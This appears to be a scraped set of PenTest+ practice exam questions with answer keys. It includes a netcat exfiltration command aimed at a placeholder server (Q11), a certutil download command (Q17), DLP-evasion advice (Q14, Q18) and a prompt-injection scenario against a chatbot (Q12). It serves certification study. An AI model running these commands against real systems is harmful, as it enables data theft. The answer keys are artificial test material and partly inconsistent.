Practice Free PT0-003 Exam Online Questions
Question #11
A tester enumerated a firewall policy and now needs to stage and exfiltrate data captured from the
engagement.
Given the following firewall policy:
Action | SRC
| DEST
| —
Block | 192.168.10.0/24 : 1-65535 | 10.0.0.0/24 : 22 | TCP
Allow | 0.0.0.0/0 : 1-65535 | 192.168.10.0/24:443 | TCP
Allow | 192.168.10.0/24 : 1-65535 | 0.0.0.0/0:443 | TCP
Block |. |. | *
Which of the following commands should the tester try next?
- A . tar -zcvf /tmp/data.tar.gz /path/to/data && nc -w 3 <remote_server> 443 < /tmp/data.tar.gz
- B . gzip /path/to/data && cp data.gz <remote_server> 443
- C . gzip /path/to/data && nc -nvlk 443; cat data.gz ‘ nc -w 3 <remote_server> 22
- D . tar -zcvf /tmp/data.tar.gz /path/to/data && scp /tmp/data.tar.gz <remote_server>
Correct Answer: A
A
Explanation:
Given the firewall policy, let’s analyze the commands provided and determine which one is suitable for exfiltrating data through the allowed network traffic. The firewall policy rules are:
Block: Any traffic from 192.168.10.0/24 to 10.0.0.0/24 on port 22 (TCP).
Allow: All traffic (0.0.0.0/0) to 192.168.10.0/24 on port 443 (TCP).
Allow: Traffic from 192.168.10.0/24 to anywhere on port 443 (TCP).
Block: All other traffic (*).
Breakdown of Options:
Option A: tar -zcvf /tmp/data.tar.gz /path/to/data && nc -w 3 <remote_server> 443 < /tmp/data.tar.gz
This command compresses the data into a tar.gz file and uses nc (netcat) to send it to a remote server on port 443.
Since the firewall allows outbound connections on port 443 (both within and outside the subnet 192.168.10.0/24), this command adheres to the policy and is the correct choice.
Option B: gzip /path/to/data && cp data.gz <remote_server> 443
This command compresses the data but attempts to copy it directly to a server, which is not a valid command. The cp command does not support network operations in this manner.
Option C: gzip /path/to/data && nc -nvlk 443; cat data.gz | nc -w 3 <remote_server> 22
This command attempts to listen on port 443 and then send data over port 22. However, outbound connections to port 22 are blocked by the firewall, making this command invalid.
Option D: tar -zcvf /tmp/data.tar.gz /path/to/data && scp /tmp/data.tar.gz <remote_server>
This command uses scp to copy the file, which typically uses port 22 for SSH. Since the firewall blocks port 22, this command will not work.
Reference from Pentest:
Gobox HTB: The Gobox write-up emphasizes the use of proper enumeration and leveraging allowed services for exfiltration. Specifically, using tools like nc for data transfer over allowed ports, similar to the method in Option A.
Forge HTB: This write-up also illustrates how to handle firewall restrictions by exfiltrating data through allowed ports and protocols, emphasizing understanding firewall rules and using appropriate commands like curl and nc.
Horizontall HTB: Highlights the importance of using allowed services and ports for data exfiltration. The approach taken in Option A aligns with the techniques used in these practical scenarios where nc is used over an allowed port.
A
Explanation:
Given the firewall policy, let’s analyze the commands provided and determine which one is suitable for exfiltrating data through the allowed network traffic. The firewall policy rules are:
Block: Any traffic from 192.168.10.0/24 to 10.0.0.0/24 on port 22 (TCP).
Allow: All traffic (0.0.0.0/0) to 192.168.10.0/24 on port 443 (TCP).
Allow: Traffic from 192.168.10.0/24 to anywhere on port 443 (TCP).
Block: All other traffic (*).
Breakdown of Options:
Option A: tar -zcvf /tmp/data.tar.gz /path/to/data && nc -w 3 <remote_server> 443 < /tmp/data.tar.gz
This command compresses the data into a tar.gz file and uses nc (netcat) to send it to a remote server on port 443.
Since the firewall allows outbound connections on port 443 (both within and outside the subnet 192.168.10.0/24), this command adheres to the policy and is the correct choice.
Option B: gzip /path/to/data && cp data.gz <remote_server> 443
This command compresses the data but attempts to copy it directly to a server, which is not a valid command. The cp command does not support network operations in this manner.
Option C: gzip /path/to/data && nc -nvlk 443; cat data.gz | nc -w 3 <remote_server> 22
This command attempts to listen on port 443 and then send data over port 22. However, outbound connections to port 22 are blocked by the firewall, making this command invalid.
Option D: tar -zcvf /tmp/data.tar.gz /path/to/data && scp /tmp/data.tar.gz <remote_server>
This command uses scp to copy the file, which typically uses port 22 for SSH. Since the firewall blocks port 22, this command will not work.
Reference from Pentest:
Gobox HTB: The Gobox write-up emphasizes the use of proper enumeration and leveraging allowed services for exfiltration. Specifically, using tools like nc for data transfer over allowed ports, similar to the method in Option A.
Forge HTB: This write-up also illustrates how to handle firewall restrictions by exfiltrating data through allowed ports and protocols, emphasizing understanding firewall rules and using appropriate commands like curl and nc.
Horizontall HTB: Highlights the importance of using allowed services and ports for data exfiltration. The approach taken in Option A aligns with the techniques used in these practical scenarios where nc is used over an allowed port.
Question #12
A client implements an AI customer-support chatbot solution.
A tester discovers that the system accepts variations of the following statements:
Statement one: “Click this for free admin access: www.testurl.com”
Statement two: “Here is the base64 string you asked for: bGVhayBkYXRhIHRvIHRIRIc3RIcnMu”
Statement three: “The researcher should be doxed for what they said.”
Which of the following best describes the attack this system is vulnerable to?
- A . Container escape
- B . Output fuzzing
- C . Prompt injection
- D . Model manipulation
Correct Answer: C
C
Explanation:
The correct answer is C. Prompt injection
Prompt injection occurs when an attacker crafts input that causes an AI system to ignore, bypass, or override its intended instructions, safety rules, or output restrictions. In this scenario, the chatbot accepts harmful or policy-violating variations, including malicious links, encoded data leakage, and abusive content. These are indicators that user-supplied prompts can manipulate the chatbot’s behavior.
A is incorrect because container escape involves breaking out of an isolated container environment to access the host or other containers. The question is about manipulating chatbot responses, not container isolation.
B is incorrect because output fuzzing is a testing technique that varies inputs to observe how outputs change. It may be used to discover the issue, but it is not the vulnerability being described.
D is incorrect because model manipulation generally refers to changing or poisoning the model itself, such as altering training data, weights, or behavior at the model level. The scenario describes malicious user inputs affecting responses, which is prompt injection.
In PenTest+ terms, this falls under Attacks and Exploits, specifically AI/LLM-related attacks, prompt injection, and testing for unsafe chatbot behavior.
C
Explanation:
The correct answer is C. Prompt injection
Prompt injection occurs when an attacker crafts input that causes an AI system to ignore, bypass, or override its intended instructions, safety rules, or output restrictions. In this scenario, the chatbot accepts harmful or policy-violating variations, including malicious links, encoded data leakage, and abusive content. These are indicators that user-supplied prompts can manipulate the chatbot’s behavior.
A is incorrect because container escape involves breaking out of an isolated container environment to access the host or other containers. The question is about manipulating chatbot responses, not container isolation.
B is incorrect because output fuzzing is a testing technique that varies inputs to observe how outputs change. It may be used to discover the issue, but it is not the vulnerability being described.
D is incorrect because model manipulation generally refers to changing or poisoning the model itself, such as altering training data, weights, or behavior at the model level. The scenario describes malicious user inputs affecting responses, which is prompt injection.
In PenTest+ terms, this falls under Attacks and Exploits, specifically AI/LLM-related attacks, prompt injection, and testing for unsafe chatbot behavior.
Question #13
A penetration tester wants to verify whether passwords from a leaked password list can be used to access an SSH server as a legitimate user.
Which of the following is the most appropriate tool for this task?
- A . BloodHound
- B . Responder
- C . Burp Suite
- D . Hydra
Correct Answer: D
D
Explanation:
The correct answer is D. Hydra
Hydra is a password-attack tool commonly used to test authentication services such as SSH, FTP, Telnet, RDP, HTTP, SMB, and others. In this scenario, the tester has a leaked password list and wants to verify whether any of those passwords can authenticate to an SSH server as a valid user. Hydra is the most appropriate tool because it can automate login attempts against SSH using usernames and password lists.
A is incorrect because BloodHound is used to analyze Active Directory relationships and identify attack paths. It is not used to test SSH logins with password lists.
B is incorrect because Responder is used to capture or poison network authentication traffic, commonly NTLM-related traffic. It is not the best tool for testing leaked passwords against SSH.
C is incorrect because Burp Suite is primarily used for web application testing. While it can test web logins, it is not designed for SSH authentication testing.
In PenTest+ terms, this falls under Attacks and Exploits, specifically password attacks, credential validation, and authentication testing against remote services.
D
Explanation:
The correct answer is D. Hydra
Hydra is a password-attack tool commonly used to test authentication services such as SSH, FTP, Telnet, RDP, HTTP, SMB, and others. In this scenario, the tester has a leaked password list and wants to verify whether any of those passwords can authenticate to an SSH server as a valid user. Hydra is the most appropriate tool because it can automate login attempts against SSH using usernames and password lists.
A is incorrect because BloodHound is used to analyze Active Directory relationships and identify attack paths. It is not used to test SSH logins with password lists.
B is incorrect because Responder is used to capture or poison network authentication traffic, commonly NTLM-related traffic. It is not the best tool for testing leaked passwords against SSH.
C is incorrect because Burp Suite is primarily used for web application testing. While it can test web logins, it is not designed for SSH authentication testing.
In PenTest+ terms, this falls under Attacks and Exploits, specifically password attacks, credential validation, and authentication testing against remote services.
Question #14
During a testing engagement, a penetration tester compromises a host and locates data for exfiltration.
Which of the following are the best options to move the data without triggering a data loss prevention tool? (Select two).
- A . Move the data using a USB flash drive.
- B . Compress and encrypt the data.
- C . Rename the file name extensions.
- D . Use FTP for exfiltration.
- E . Encode the data as Base64.
- F . Send the data to a commonly trusted service.
Correct Answer: B,E
B,E
Explanation:
Data Loss Prevention (DLP) tools monitor sensitive data and prevent unauthorized exfiltration.
The two best options to bypass DLP are:
Compress and encrypt the data (Option B):
Compression reduces file size, making detection harder. Encryption further protects the data by making it unreadable without a key.
DLP tools often inspect content based on known patterns (e.g., credit card numbers, sensitive keywords). Encrypted files bypass content inspection since DLP cannot analyze encrypted data.
Reference: CompTIA PenTest+ PT0-003 Official Study Guide – "Data Exfiltration Techniques"
Encode the data as Base64 (Option E):
Base64 encoding disguises data by converting it into ASCII text, making it less likely to trigger DLP signature-based detection.
Many DLP systems do not analyze encoded text deeply, assuming it is non-sensitive.
Reference: CompTIA PenTest+ PT0-003 Official Study Guide – "Encoding and Obfuscation in Exfiltration"
Incorrect options:
Option A (USB flash drive): Physical exfiltration is risky and easily detectable in enterprise environments.
Option C (Rename file extensions): DLP systems analyze content, not just filenames.
Option D (FTP for exfiltration): FTP is monitored by security tools and is a high-risk method.
Option F (Trusted service): Many organizations monitor outbound traffic to cloud storage or email services.
B,E
Explanation:
Data Loss Prevention (DLP) tools monitor sensitive data and prevent unauthorized exfiltration.
The two best options to bypass DLP are:
Compress and encrypt the data (Option B):
Compression reduces file size, making detection harder. Encryption further protects the data by making it unreadable without a key.
DLP tools often inspect content based on known patterns (e.g., credit card numbers, sensitive keywords). Encrypted files bypass content inspection since DLP cannot analyze encrypted data.
Reference: CompTIA PenTest+ PT0-003 Official Study Guide – "Data Exfiltration Techniques"
Encode the data as Base64 (Option E):
Base64 encoding disguises data by converting it into ASCII text, making it less likely to trigger DLP signature-based detection.
Many DLP systems do not analyze encoded text deeply, assuming it is non-sensitive.
Reference: CompTIA PenTest+ PT0-003 Official Study Guide – "Encoding and Obfuscation in Exfiltration"
Incorrect options:
Option A (USB flash drive): Physical exfiltration is risky and easily detectable in enterprise environments.
Option C (Rename file extensions): DLP systems analyze content, not just filenames.
Option D (FTP for exfiltration): FTP is monitored by security tools and is a high-risk method.
Option F (Trusted service): Many organizations monitor outbound traffic to cloud storage or email services.
Question #15
A company that uses an insecure corporate wireless network is concerned about security.
Which of the following is the most likely tool a penetration tester could use to obtain initial access?
- A . Responder
- B . Metasploit
- C . Netcat
- D . Nmap
Correct Answer: A
A
Explanation:
Given an insecure wireless network (e.g., open or poorly secured Wi-Fi), a practical initial access technique is to capture or poison name resolution/authentication requests from client systems once they are on that network. Responder is designed to perform LLMNR/NBT-NS/MDNS poisoning and capture NTLM authentication attempts and other credential material on a local network segment. On an insecure Wi-Fi network an attacker can either join the network or run a rogue AP and then run Responder to capture credentials from connected clients ― a typical and effective initial-access method in such scenarios.
Why not the others:
B. Metasploit ― a general exploitation framework; useful after finding a vulnerable service, but not specifically the most-likely initial tool on an insecure Wi-Fi.
C. Netcat ― a raw TCP/UDP utility (listeners/shells); useful post-exploitation but not for capturing broadcast name resolution requests.
D. Nmap ― a scanner to discover hosts/ports; helpful reconnaissance, but not directly used to capture credentials on a local insecure wireless segment.
CompTIA PT0-003 Mapping: Wireless/host-based attacks and network credential-capture techniques (evil twin/rogue AP and LLMNR/NetBIOS poisoning).
A
Explanation:
Given an insecure wireless network (e.g., open or poorly secured Wi-Fi), a practical initial access technique is to capture or poison name resolution/authentication requests from client systems once they are on that network. Responder is designed to perform LLMNR/NBT-NS/MDNS poisoning and capture NTLM authentication attempts and other credential material on a local network segment. On an insecure Wi-Fi network an attacker can either join the network or run a rogue AP and then run Responder to capture credentials from connected clients ― a typical and effective initial-access method in such scenarios.
Why not the others:
B. Metasploit ― a general exploitation framework; useful after finding a vulnerable service, but not specifically the most-likely initial tool on an insecure Wi-Fi.
C. Netcat ― a raw TCP/UDP utility (listeners/shells); useful post-exploitation but not for capturing broadcast name resolution requests.
D. Nmap ― a scanner to discover hosts/ports; helpful reconnaissance, but not directly used to capture credentials on a local insecure wireless segment.
CompTIA PT0-003 Mapping: Wireless/host-based attacks and network credential-capture techniques (evil twin/rogue AP and LLMNR/NetBIOS poisoning).
Question #16
During a penetration test, a tester captures information about an SPN account.
Which of the following attacks requires this information as a prerequisite to proceed?
- A . Golden Ticket
- B . Kerberoasting
- C . DCShadow
- D . LSASS dumping
Correct Answer: B
B
Explanation:
Kerberoasting is an attack that specifically targets Service Principal Name (SPN) accounts in a Windows Active Directory environment.
Here ’ s a detailed explanation:
Understanding SPN Accounts:
SPNs are unique identifiers for services in a network that allows Kerberos to authenticate service accounts. These accounts are often associated with services such as SQL Server, IIS, etc.
Kerberoasting Attack:
Prerequisite: Knowledge of the SPN account.
Process: An attacker requests a service ticket for the SPN account using the Kerberos protocol. The ticket is encrypted with the service account’s NTLM hash. The attacker captures this ticket and attempts to crack the hash offline.
Objective: To obtain the plaintext password of the service account, which can then be used for lateral movement or privilege escalation.
Comparison with Other Attacks:
Golden Ticket: Involves forging Kerberos TGTs using the KRBTGT account hash, requiring domain admin credentials.
DCShadow: Involves manipulating Active Directory data by impersonating a domain controller, typically requiring high privileges.
LSASS Dumping: Involves extracting credentials from the LSASS process on a Windows machine, often requiring local admin privileges.
Kerberoasting specifically requires the SPN account information to proceed, making it the correct answer.
B
Explanation:
Kerberoasting is an attack that specifically targets Service Principal Name (SPN) accounts in a Windows Active Directory environment.
Here ’ s a detailed explanation:
Understanding SPN Accounts:
SPNs are unique identifiers for services in a network that allows Kerberos to authenticate service accounts. These accounts are often associated with services such as SQL Server, IIS, etc.
Kerberoasting Attack:
Prerequisite: Knowledge of the SPN account.
Process: An attacker requests a service ticket for the SPN account using the Kerberos protocol. The ticket is encrypted with the service account’s NTLM hash. The attacker captures this ticket and attempts to crack the hash offline.
Objective: To obtain the plaintext password of the service account, which can then be used for lateral movement or privilege escalation.
Comparison with Other Attacks:
Golden Ticket: Involves forging Kerberos TGTs using the KRBTGT account hash, requiring domain admin credentials.
DCShadow: Involves manipulating Active Directory data by impersonating a domain controller, typically requiring high privileges.
LSASS Dumping: Involves extracting credentials from the LSASS process on a Windows machine, often requiring local admin privileges.
Kerberoasting specifically requires the SPN account information to proceed, making it the correct answer.
Question #17
A penetration tester needs to use the native binaries on a system in order to download a file from the internet and evade detection.
Which of the following tools would the tester most likely use?
- A . netsh.exe
- B . certutil.exe
- C . nc.exe
- D . cmdkey.exe
Correct Answer: B
B
Explanation:
Certutil.exe for File Downloads:
certutil.exe is a native Windows utility primarily used for managing certificates but can also be leveraged to download files from the internet.
Example command:
bash
Copy code
certutil.exe -urlcache -split -f http://example.com/file.exe file.exe
Its native status helps it evade detection by security tools.
Why Not Other Options?
A (netsh.exe): Used for network configuration but not for downloading files.
C (nc.exe): Netcat is not native to Windows and would need to be introduced to the system.
D (cmdkey.exe): Used for managing stored credentials, not downloading files.
CompTIA Pentest+
Reference: Domain 3.0 (Attacks and Exploits)
B
Explanation:
Certutil.exe for File Downloads:
certutil.exe is a native Windows utility primarily used for managing certificates but can also be leveraged to download files from the internet.
Example command:
bash
Copy code
certutil.exe -urlcache -split -f http://example.com/file.exe file.exe
Its native status helps it evade detection by security tools.
Why Not Other Options?
A (netsh.exe): Used for network configuration but not for downloading files.
C (nc.exe): Netcat is not native to Windows and would need to be introduced to the system.
D (cmdkey.exe): Used for managing stored credentials, not downloading files.
CompTIA Pentest+
Reference: Domain 3.0 (Attacks and Exploits)
Question #18
Which of the following techniques is the best way to avoid detection by Data Loss Prevention (DLP) tools?
- A . Encoding
- B . Compression
- C . Encryption
- D . Obfuscation
Correct Answer: C
C
Explanation:
Data Loss Prevention (DLP) tools monitor network traffic and files for sensitive information leaks. The most effective way to bypass DLP is to use encryption, since DLP systems cannot inspect encrypted content.
Option A (Encoding) ❌ : Base64 or Hex encoding can sometimes bypass filters, but many DLP tools detect common encoding schemes.
Option B (Compression) ❌ : Compression can change file signatures, but modern DLP systems can inspect compressed files.
Option C (Encryption) ✅ : Correct.
Strong encryption prevents DLP tools from analyzing file contents.
Option D (Obfuscation) ❌ : Code obfuscation may work for source code leaks, but DLP solutions use heuristics to detect patterns.
Reference: CompTIA PenTest+ PT0-003 Official Guide C Bypassing Security Controls
C
Explanation:
Data Loss Prevention (DLP) tools monitor network traffic and files for sensitive information leaks. The most effective way to bypass DLP is to use encryption, since DLP systems cannot inspect encrypted content.
Option A (Encoding) ❌ : Base64 or Hex encoding can sometimes bypass filters, but many DLP tools detect common encoding schemes.
Option B (Compression) ❌ : Compression can change file signatures, but modern DLP systems can inspect compressed files.
Option C (Encryption) ✅ : Correct.
Strong encryption prevents DLP tools from analyzing file contents.
Option D (Obfuscation) ❌ : Code obfuscation may work for source code leaks, but DLP solutions use heuristics to detect patterns.
Reference: CompTIA PenTest+ PT0-003 Official Guide C Bypassing Security Controls
Question #19
During the reconnaissance phase, a penetration tester collected the following information from the DNS records:
A—–> www
A—–> host
TXT –> vpn.comptia.org
SPF—> ip =2.2.2.2
Which of the following DNS records should be in place to avoid phishing attacks using spoofing domain techniques?
- A . MX
- B . SOA
- C . DMARC
- D . CNAME
Correct Answer: C
C
Explanation:
DMARC (Domain-based Message Authentication, Reporting & Conformance) is an email authentication protocol that helps prevent email spoofing and phishing. It builds on SPF (Sender Policy Framework) and DKIM (DomainKeys Identified Mail) to provide a mechanism for email senders and receivers to improve and monitor the protection of the domain from fraudulent email.
Understanding DMARC:
SPF: Defines which IP addresses are allowed to send emails on behalf of a domain.
DKIM: Provides a way to check that an email claiming to come from a specific domain was indeed authorized by the owner of that domain.
DMARC: Uses SPF and DKIM to determine the authenticity of an email and specifies what action to take if the email fails the authentication checks.
Implementing DMARC:
Create a DMARC policy in your DNS records. This policy can specify to reject, quarantine, or take no action on emails that fail SPF or DKIM checks.
Example DMARC record: v=DMARC1; p=reject; rua=mailto:[email protected];
Benefits of DMARC:
Helps to prevent email spoofing and phishing attacks.
Provides visibility into email sources through reports.
Enhances domain reputation by ensuring only legitimate emails are sent from the domain.
DMARC Record Components:
v: Version of DMARC.
p: Policy for handling emails that fail the DMARC check (none, quarantine, reject). rua: Reporting URI of aggregate reports.
ruf: Reporting URI of forensic reports.
pct: Percentage of messages subjected to filtering. Real-World Example:
A company sets up a DMARC policy with p=reject to ensure that any emails failing SPF or DKIM
checks are rejected outright, significantly reducing the risk of phishing attacks using their domain.
Reference from Pentesting Literature:
In "Penetration Testing – A Hands-on Introduction to Hacking," DMARC is mentioned as part of email security protocols to prevent phishing.
HTB write-ups often highlight the importance of DMARC in securing email communications and preventing spoofing attacks.
Step-by-Step ExplanationReference: Penetration Testing – A Hands-on Introduction to Hacking HTB Official Writeups
C
Explanation:
DMARC (Domain-based Message Authentication, Reporting & Conformance) is an email authentication protocol that helps prevent email spoofing and phishing. It builds on SPF (Sender Policy Framework) and DKIM (DomainKeys Identified Mail) to provide a mechanism for email senders and receivers to improve and monitor the protection of the domain from fraudulent email.
Understanding DMARC:
SPF: Defines which IP addresses are allowed to send emails on behalf of a domain.
DKIM: Provides a way to check that an email claiming to come from a specific domain was indeed authorized by the owner of that domain.
DMARC: Uses SPF and DKIM to determine the authenticity of an email and specifies what action to take if the email fails the authentication checks.
Implementing DMARC:
Create a DMARC policy in your DNS records. This policy can specify to reject, quarantine, or take no action on emails that fail SPF or DKIM checks.
Example DMARC record: v=DMARC1; p=reject; rua=mailto:[email protected];
Benefits of DMARC:
Helps to prevent email spoofing and phishing attacks.
Provides visibility into email sources through reports.
Enhances domain reputation by ensuring only legitimate emails are sent from the domain.
DMARC Record Components:
v: Version of DMARC.
p: Policy for handling emails that fail the DMARC check (none, quarantine, reject). rua: Reporting URI of aggregate reports.
ruf: Reporting URI of forensic reports.
pct: Percentage of messages subjected to filtering. Real-World Example:
A company sets up a DMARC policy with p=reject to ensure that any emails failing SPF or DKIM
checks are rejected outright, significantly reducing the risk of phishing attacks using their domain.
Reference from Pentesting Literature:
In "Penetration Testing – A Hands-on Introduction to Hacking," DMARC is mentioned as part of email security protocols to prevent phishing.
HTB write-ups often highlight the importance of DMARC in securing email communications and preventing spoofing attacks.
Step-by-Step ExplanationReference: Penetration Testing – A Hands-on Introduction to Hacking HTB Official Writeups
Question #20
A penetration tester conducts a web application assessment and receives the following Set-Cookie upon logging in:
Set-Cookie auth=UGVudGVzdFVzZXI6OTE1MzYK
Upon analysis, the penetration tester determines this is a Base64-encoded string, which when decoded reads:
Pentestuser:91536
The penetration tester logs out, logs back in, and sees the decoded string now reads:
Pentestuser:91944
Which of the following attacks will the penetration tester most likely conduct based on this information?
- A . Collision attack
- B . JWT manipulation
- C . Session hijacking
- D . Insecure direct object reference
Correct Answer: C
C
Explanation:
The correct answer is C. Session hijacking
The cookie value is only Base64 encoded, not encrypted or cryptographically protected. When decoded, it reveals a username and a numeric value:
Pentestuser:91536
After logging in again, the numeric value changes:
Pentestuser:91944
This strongly suggests the application may be storing a session identifier or authentication token in a predictable or weakly protected format. A penetration tester would most likely test whether the session value can be guessed, reused, modified, or replayed to take over another user’s session. That type of attack is session hijacking.
A is incorrect because a collision attack involves finding two different inputs that produce the same hash value. This scenario does not involve hash collision testing.
B is incorrect because JWT manipulation applies to JSON Web Tokens, which typically have three Base64URL-encoded sections separated by periods, such as header.payload.signature. The cookie shown is not a JWT.
D is incorrect because insecure direct object reference involves manipulating object identifiers, such as account IDs, invoice numbers, or file IDs, to access unauthorized resources. The issue here is related to authentication/session handling, not direct object access.
In PenTest+ terms, this falls under Attacks and Exploits, specifically web application attacks involving weak session management, predictable session tokens, and session hijacking.
C
Explanation:
The correct answer is C. Session hijacking
The cookie value is only Base64 encoded, not encrypted or cryptographically protected. When decoded, it reveals a username and a numeric value:
Pentestuser:91536
After logging in again, the numeric value changes:
Pentestuser:91944
This strongly suggests the application may be storing a session identifier or authentication token in a predictable or weakly protected format. A penetration tester would most likely test whether the session value can be guessed, reused, modified, or replayed to take over another user’s session. That type of attack is session hijacking.
A is incorrect because a collision attack involves finding two different inputs that produce the same hash value. This scenario does not involve hash collision testing.
B is incorrect because JWT manipulation applies to JSON Web Tokens, which typically have three Base64URL-encoded sections separated by periods, such as header.payload.signature. The cookie shown is not a JWT.
D is incorrect because insecure direct object reference involves manipulating object identifiers, such as account IDs, invoice numbers, or file IDs, to access unauthorized resources. The issue here is related to authentication/session handling, not direct object access.
In PenTest+ terms, this falls under Attacks and Exploits, specifically web application attacks involving weak session management, predictable session tokens, and session hijacking.